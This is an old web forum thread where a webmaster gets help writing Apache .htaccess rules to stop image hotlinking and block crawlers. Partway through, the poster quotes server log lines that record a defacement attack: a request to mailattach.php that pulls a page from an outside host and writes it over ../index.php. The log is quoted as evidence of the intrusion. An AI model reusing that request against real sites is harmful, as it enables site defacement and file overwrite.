Welcome to WebmasterWorld Guest from 54.147.63.124

Forum Moderators: Ocean10000 & incrediBILL & phranque

Message Too Old, No Replies

.htaccess problems on Apache 2

500 errors

     
2:04 pm on Sep 19, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi everybody.

I'm so new at this that I can't figure out Apache, nor the syntaxes listed here. I have been arounf the forum here a bit to see if there allready was a solution to my problem, and I guess there is, but I can't figure out howto implement it to my apache.

I tried, but apache complained and wouldn't start up again.

Here is basicly my 2 problems.

1. Remote usage of images. I have seen in my logs that the reason for my decrasing speed is some forums have posted up a great range of my images. The result was that my 4000 Kb line was crawling. I have now shut down until I have a working solution for it.

2. Crawlers, spiders, and spam bots.

Every 5 minutes there is a spider crawling around. Espesially from Slurp/cat; slurp@inktomi.com and 216.88.158.142.

I have a htaccess fil in root, but when I tried to have RewriteCond syntaxes that I found here, apache belched and wouldn't start.

.htaccess: RewriteCond not allowed here
htaccess: The FancyIndexing directive is no longer supported. Use IndexOptions FancyIndexing.
RewriteRule not allowed here
RewriteEngine not allowed here.

So the only thing apache allows me to have in my htaccess fil is:

<LIMIT GET>
order deny,allow
deny from 69.44.33.104
</Limit>

Wich is very useful to shut spiders out of the system. But what about remote image posting?

Thank you

Ciao

5:34 pm on Sept 19, 2003 (gmt 0)

Administrator

WebmasterWorld Administrator jatar_k is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:July 24, 2001
posts:15755
votes: 0


Welcome to WebmasterWorld Dr_Goodman,

How about these threads.

1.
Using .htaccess to prevent image linking [webmasterworld.com]
Prevent remote image linking? [webmasterworld.com]

2.
A Close to perfect .htaccess ban list [webmasterworld.com]
A Close to perfect .htaccess ban list - Part 2 [webmasterworld.com]

A lot of reading but the answers are all in there.

9:33 pm on Sept 19, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi, Thank you for you welcome.

I must be very green, because I don't get it. I have read and re-read thoose postings, and Tried, but I still get a 500 error from Apache. Seems he dosen't like me to fiddle to much.

I have this in my .htaccess file in mye root:

RewriteEngine on
RewriteCond %{HTTP_REFERER} ¦^$
RewriteCond %{HTTP_REFERER} ¦^http://(www\.)?mydomain\.com [NC]
RewriteRule \.(gif!jpg!png!GIF!JPG!PNG)$ - [NC,F]
# changed! to the correct vertical line.
<LIMIT GET>
order deny,allow
deny from 69.44.33.104
</Limit>

Apache didn't like this much, so I tried to set this above

<LIMIT GET>
order deny,allow
deny from 69.44.33.104
</Limit>

And still got an 500 error.

In one of the posting there was a reference to:

SetEnvIfNoCase
FilesMatch

witch I can't find in the template httpd.conf so I have no idea what to do with it or what syntax to use.

Please, need help in a teaspoon

Ciao

8:49 pm on Sept 20, 2003 (gmt 0)

Full Member

10+ Year Member

joined:Aug 20, 2003
posts:255
votes: 0


I've got three questions:

1. You said that you got a 500 error. Your error log should give you more details as to why there is an error. What does it say?

2. Do you have mod_rewrite enabled in httpd.conf?

3. If most of the spiders taking up your bandwidth are ones that comply with commands in robots.txt, why not try doing it there first? That way, you can be selective about which files they can and can't spider.

BTW, you can find a Directive Quick Reference for Apache 2.0 at:
[httpd.apache.org ]

9:10 pm on Sept 20, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi

I have read the error log and have a big robots.txt, but some of them comply with it, but they try every 5 minutes. Slurp and zyborg are the worst. And some from spammers.

But in the meantime, I found out that I've been defaced. After all that stairing in the logs braught to my attention this:

( I've closed doors now )

[Sat Sep 20 15:04:25 2003] [error] [client IP number] File does not exist: /var/www/html/images/banners, referer: [mydomain.com...]
[Sat Sep 20 15:05:24 2003] [error] [client IP number] File does not exist: /var/www/html/mailattach.php
[Sat Sep 20 15:05:26 2003] [error] [client IP number] client denied by server configuration: /var/www/html/logo.png, referer: [mydomain.com...]
[Sat Sep 20 15:08:32 2003] [error] [client IP number] File does not exist: /var/www/html/mailattach.php
[Sat Sep 20 15:08:36 2003] [error] [client IP number] File does not exist: /var/www/html/mailattach.php

195.92.168.168 - - [20/Sep/2003:15:05:24 +0200] "GET /mailattach.php?submit=1&attach1=http://negative0.no-ip.com/domz/defacement/index.php&attach1_name=../index.php HTTP/1.1" 404 1655 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
195.92.168.168 - - [20/Sep/2003:15:05:26 +0200] "GET /logo.png HTTP/1.1" 403 1606

I used to have MyPHPnuke 1.8.8_7, but now I closed shop

Maybe I've take up this thread at a later time

Ciao

11:01 pm on Sept 20, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member jdmorgan is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Mar 31, 2002
posts:25430
votes: 0


Dr_Goodman,

Welcome to WebmasterWorld [webmasterworld.com]!

I see several problems here, one of which would make Apache sick:

First, the character preceding ^ in the second and third lines should be an exclamation point, not a pipe character.

Second, the all-capitals GIF¦JPG¦PNG in the RewriteRule are redundant; the [NC] flag at the end makes the pattern match case-insensitive, so there is not need to specify the all-caps versions.

A nit-pick, but <LIMIT GET> should be <Limit GET>. Also, this means that the Deny from 69.44.33.140 will only be effective against GET requests. It will not stop that IP from doing a POST, DELETE, or any of the other methods. You might consider wrapping the deny in a <Files *> directive instead, so it will affect all files and all methods.

Change the broken vertical lines in the RewriteRule pattern (only) to soild vertical lines before use.


RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?mydomain\.com [NC]
RewriteRule \.(gif¦jpg¦png)$ - [NC,F]
<Files *>
Order Deny,Allow
Deny from 69.44.33.104
</Files>

Also, add:

RewriteRule ^\.ht - [F]

below RewriteEngine on. This denies HTTP user access to your .htaccess and .htpasswd files.

Jim

[edited by: jdMorgan at 11:42 pm (utc) on Sep. 20, 2003]

11:04 pm on Sept 20, 2003 (gmt 0)

Administrator

WebmasterWorld Administrator jatar_k is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:July 24, 2001
posts:15755
votes: 0


I must be very green

I wouldn't look at it that way, I answered your questions with other threads because this is not easy stuff and isn't really in my realm of expertise. I was also hoping it would keep it on the radar so jdMorgan would show up. ;)

11:46 pm on Sept 20, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 19, 2003
posts:4
votes: 0


Hi jatar_k, closed and jdMorgan

Thank you

Apache didn't complain so much now. Great stuff.

Just one more question:

This rule
RewriteCond %{HTTP_REFERER}!^http://(www\.)?mydomain\.com [NC]

goes just to my main web. But what is the correct syntax for virtual webs?

Is it:

RewriteCond %{HTTP_REFERER}!^http://(virtual\.)?mydomain\.com [NC]

Thank all again

( I have to mention that I was a bit down when I posted my last post, after I discovered that my website had been hacked )

2:12 am on Sept 21, 2003 (gmt 0)

Full Member

10+ Year Member

joined:Aug 20, 2003
posts:255
votes: 0


Do you mean subdomains? If so, one way to do it would be this:

RewriteCond %{HTTP_REFERER} !^http://([a-z]+\.)*mydomain\.com/ [NC]

I added a forward slash after .com so that a referrer like, say, mydomain.computerdomain.com wouldn't be allowed to link to your images.

The ([a-z]+\.)* allows addresses like www.mydomain.com to be valid, as well as virtual.mydomain.com and www.virtual.mydomain.com. You could make it even more flexible than that, like allowing numbers and non-alphanumeric characters, but if I did that, I would be taking away from your fun with regular expressions. You can learn more about regexes here [etext.lib.virginia.edu].

 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members